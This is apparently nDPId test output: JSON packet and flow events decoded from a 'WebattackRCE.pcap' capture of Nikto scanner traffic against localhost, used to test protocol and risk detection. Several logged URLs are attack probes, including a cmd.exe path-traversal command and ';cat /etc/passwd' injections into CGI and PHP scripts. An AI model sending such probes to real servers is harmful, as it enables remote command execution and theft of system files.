-01124{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277526,"flow_last_seen":1576420277526,"flow_idle_time":7440000,"flow_min_l4_payload_len":200,"flow_max_l4_payload_len":200,"flow_tot_l4_payload_len":200,"flow_avg_l4_payload_len":200,"midstream":1,"thread_ts_msec":1576420277526,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50622,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/..%255c..\/..%255c..\/..%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:%5c","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000495)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1576420277527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277527,"pkt":"AAAAAAAAAAAAAAAACABFAADOGxtAAEAGIQ1\/AAABfwAAAcXAH5ABqiP992RjDoAYAED+wgAAAQEICp1m\/j+dZv4\/R0VUIC9tc2FkYy9zYW1wbGVzL2FkY3Rlc3QuYXNwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwNDk2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277527,"flow_last_seen":1576420277527,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277527,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50624,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/samples\/adctest.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000496)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00707{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1576420277528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420277528,"pkt":"AAAAAAAAAAAAAAAACABFAADdW\/pAAEAG4B5\/AAABfwAAAcXCH5D1lWMf6eFgloAYAED+0QAAAQEICp1m\/kCdZv5AR0VUIC9hdGhlbmFyZWcucGhwP3Bhc3M9JTIwO2NhdCUyMC9ldGMvcGFzc3dkIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDA2NjcpDQoNCg=="} -01088{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277528,"flow_last_seen":1576420277528,"flow_idle_time":7440000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"flow_avg_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420277528,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50626,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/athenareg.php?pass=%20;cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000667)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1576420277534,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420277534,"pkt":"AAAAAAAAAAAAAAAACABFAADO4OJAAEAGW0V\/AAABfwAAAcXEH5B2FdgIExVLAoAYAED+wgAAAQEICp1m\/kWdZv5FR0VUIC9jZC1jZ2kvc3NjZF9zdW5jb3VyaWVyLnBsIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":533,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277534,"flow_last_seen":1576420277534,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277534,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50628,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cd-cgi\/sscd_suncourier.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001067)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1576420277535,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277535,"pkt":"AAAAAAAAAAAAAAAACABFAADEalJAAEAG0d9\/AAABfwAAAcXGH5Ak\/VK4qoIqcIAYAED+uAAAAQEICp1m\/kedZv5HR0VUIC9jZ2ktYmluL2hhbmRsZXIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA2OSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277535,"flow_last_seen":1576420277535,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277535,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50630,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001069)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00726{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1576420277536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":250,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":250,"pkt_l4_len":216,"thread_ts_msec":1576420277536,"pkt":"AAAAAAAAAAAAAAAACABFAADsKwtAAEAGEP9\/AAABfwAAAcXIH5DuMhPiKIF7BYAYAED+4AAAAQEICp1m\/kidZv5IR0VUIC9jZ2ktYmluL2hhbmRsZXIvbmV0c29uYXI7Y2F0IC9ldGMvcGFzc3dkfD9kYXRhPURvd25sb2FkIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01105{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277536,"flow_last_seen":1576420277536,"flow_idle_time":7440000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":1,"thread_ts_msec":1576420277536,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/handler\/netsonar;cat \/etc\/passwd|?data=Download","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001070)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_packet_id":1,"flow_last_seen":1576420277537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277537,"pkt":"AAAAAAAAAAAAAAAACABFAADIaaFAAEAG0ox\/AAABfwAAAcXKH5CUxlF4c7zrSYAYAED+vAAAAQEICp1m\/kmdZv5JR0VUIC9jZ2ktYmluL3dlYmRpc3QuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzEpDQoNCg=="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":536,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277537,"flow_last_seen":1576420277537,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277537,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50634,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/webdist.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001071)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_packet_id":1,"flow_last_seen":1576420277538,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420277538,"pkt":"AAAAAAAAAAAAAAAACABFAADL1l9AAEAGZct\/AAABfwAAAcXMH5AhiO62DmMqh4AYAED+vwAAAQEICp1m\/kqdZv5KR0VUIC9EQjRXZWIvMTAuMTAuMTAuMTA6MTAwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEwNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":537,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277538,"flow_last_seen":1576420277538,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420277538,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50636,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/DB4Web\/10.10.10.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001072)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":1,"flow_last_seen":1576420277540,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277540,"pkt":"AAAAAAAAAAAAAAAACABFAADPftlAAEAGvU1\/AAABfwAAAcXOH5DRSkY\/0jWbSIAYAED+wwAAAQEICp1m\/kydZv5MR0VUIC9ld3MvZXdzL2FyY2hpdGV4dF9xdWVyeS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDczKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01074{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":538,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277540,"flow_last_seen":1576420277540,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277540,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50638,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ews\/ews\/architext_query.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001073)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1576420277543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277543,"pkt":"AAAAAAAAAAAAAAAACABFAADI031AAEAGaLB\/AAABfwAAAcXQH5AqpOuTqUte6oAYAED+vAAAAQEICp1m\/k+dZv5OR0VUIC9leGVjL3Nob3cvY29uZmlnL2NyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMDc0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277543,"flow_last_seen":1576420277543,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277543,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50640,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/exec\/show\/config\/cr","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001074)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1576420277544,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420277544,"pkt":"AAAAAAAAAAAAAAAACABFAADPHndAAEAGHbB\/AAABfwAAAcXSH5BxSyag9dSEBYAYAED+wwAAAQEICp1m\/lCdZv5QR0VUIC9pbnN0YW50d2VibWFpbC9tZXNzYWdlLnBocCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTA3NSkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277544,"flow_last_seen":1576420277544,"flow_idle_time":7440000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420277544,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50642,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/instantwebmail\/message.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001075)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277546,"flow_last_seen":1576420277546,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277546,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50644,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 